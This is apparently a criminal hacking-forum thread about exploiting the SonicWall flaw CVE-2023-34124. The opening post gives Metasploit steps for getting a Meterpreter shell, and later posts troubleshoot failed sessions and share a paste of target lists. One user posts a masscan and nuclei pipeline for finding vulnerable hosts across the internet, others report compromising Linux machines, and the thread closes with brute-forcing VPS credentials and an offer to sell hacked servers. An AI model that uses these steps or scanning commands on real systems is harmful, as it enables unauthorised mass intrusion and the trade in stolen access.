Remote Sonicwall RCE CVE-2023-34124

[0x00x0]

    Start msfconsole
    Do use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124
    Set the appropriate TARGET, RHOST, LHOST, and possibly FETCH_SRVHOST (for Windows)
    Do run
    You should get meterpreter

github.com/rapid7/metasploit-framework/pull/18302

 

[nirvana]

is there any mass-checker( scanner) for this one?
thanks for you post

 

[nirvana]

[*] Attempting to execute the shell injection payload
[+] Payload sent!
[*] Exploit completed, but no session was created.

does anybody know the reason for this?

 

[basileusapoleiaoff]

[*] Attempting to execute the shell injection payload
[+] Payload sent!
[*] Exploit completed, but no session was created.

does anybody know the reason for this?

Reason 1: Mismatch of payload and exploit architecture
Reason 2: Mismatch in LHOST / SRVHOST

Reason 3: You are behind NAT

Reason 4: Restrictive firewall policy

Reason 5: Killed by Antivirus / EDR

Reason 6: Exploit is unreliable

Reason 7: Target is patched


I found this tutorial who explain how to fix it

By the way metasploit is a skid tool, it's better to create you're own exploit with you're own features.


https://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/

I Hope this helped you have a nice day

 

[nirvana]

Reason 1: Mismatch of payload and exploit architecture
Reason 2: Mismatch in LHOST / SRVHOST

Reason 3: You are behind NAT

Reason 4: Restrictive firewall policy

Reason 5: Killed by Antivirus / EDR

Reason 6: Exploit is unreliable

Reason 7: Target is patched


I found this tutorial who explain how to fix it

By the way metasploit is a skid tool, it's better to create you're own exploit with you're own features.


https://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/

I Hope this helped you have a nice day

thank you so much

 

[xanthopsia]

Some targets to check: https://pastebin.com/3LMygR4J
I'm also getting

[*] Exploit completed, but no session was created,

though.

 

[nirvana]

Some targets to check: https://pastebin.com/3LMygR4J
I'm also getting

[*] Exploit completed, but no session was created,

though.

it didn't give you any session at all too?

 

[nirvana]

Reason 1: Mismatch of payload and exploit architecture
Reason 2: Mismatch in LHOST / SRVHOST

Reason 3: You are behind NAT

Reason 4: Restrictive firewall policy

Reason 5: Killed by Antivirus / EDR

Reason 6: Exploit is unreliable

Reason 7: Target is patched


I found this tutorial who explain how to fix it

By the way metasploit is a skid tool, it's better to create you're own exploit with you're own features.


https://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/

I Hope this helped you have a nice day

incase if you have used this exploit
may i ask what payload you are using?

 

[basileusapoleiaoff]

incase if you have used this exploit
may i ask what payload you are using?

Nop i don't use this exploit, but really if you have some skill in exploit dev make you're own, i'm too busy right now to make one for this exploit.

 

[Ram0s2]

is there any mass-checker( scanner) for this one?
thanks for you post

Shodan & masscan

 

[xanthopsia]

it didn't give you any session at all too?

Yes, but I've noticed this problem quite a lot when using metasploit modules, so I guess would be better to test the exploit locally to see where it fails & rewrite it from the metasploits one.

 

[utpxgrbdvn]

Линукс пробивает, а винду нет. У кого-то получалось?

 

[qGodless]

Linux breaks through, but Windows does not. Has anyone succeeded?

maybe the target is badly configured, ive gotten 2 linux and they work amazing

 

[xanthopsia]

maybe the target is badly configured, ive gotten 2 linux and they work amazing

That's what happens when you use translate. What he means is the exploit works on Linux machines, while doesn't work on Windows.

 

[qGodless]

That's what happens when you use translate. What he means is the exploit works on Linux machines, while doesn't work on Windows.

I just spent one year on this forum reading and answering meaningless stuff

 

[Prokhorenco]

is there any mass-checker( scanner) for this one?
thanks for you post

sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p8080,8443,4443,4433,80,443,10443,4444,9443 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt

awk '{ print $4 ":" $3 }' results.txt > final_results.txt

nuclei -l final_results.txt -t nuclei-templates/http/cves/2023/CVE-2023-34124.yaml -o vulns.txt

 

[Prokhorenco]

sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p8080,8443,4443,4433,80,443,10443,4444,9443 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt

awk '{ print $4 ":" $3 }' results.txt > final_results.txt

nuclei -l final_results.txt -t nuclei-templates/http/cves/2023/CVE-2023-34124.yaml -o vulns.txt

Mistake*

sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p8080,8443,4443,4433,80,443,10443,4444,9443 --open-only --excludefile block.txt --output-format list --output-file results.txt

 

[Focus17]

nuclei -l final_results.txt -t nuclei-templates/http/cves/2023/CVE-2023-34124.yaml -o vulns.txt

не работает шаблон в нуклеи
шаблон не сработал на шодановских ипах

 

[ski]

sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p8080,8443,4443,4433,80,443,10443,4444,9443 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt

awk '{ print $4 ":" $3 }' results.txt > final_results.txt

nuclei -l final_results.txt -t nuclei-templates/http/cves/2023/CVE-2023-34124.yaml -o vulns.txt

How to get hacked vps ?
You purchase or just brute force with credentials?

 

[Senku]

How to get hacked vps?
You purchase or just brute force with credentials?

I sell hacked vps
PM me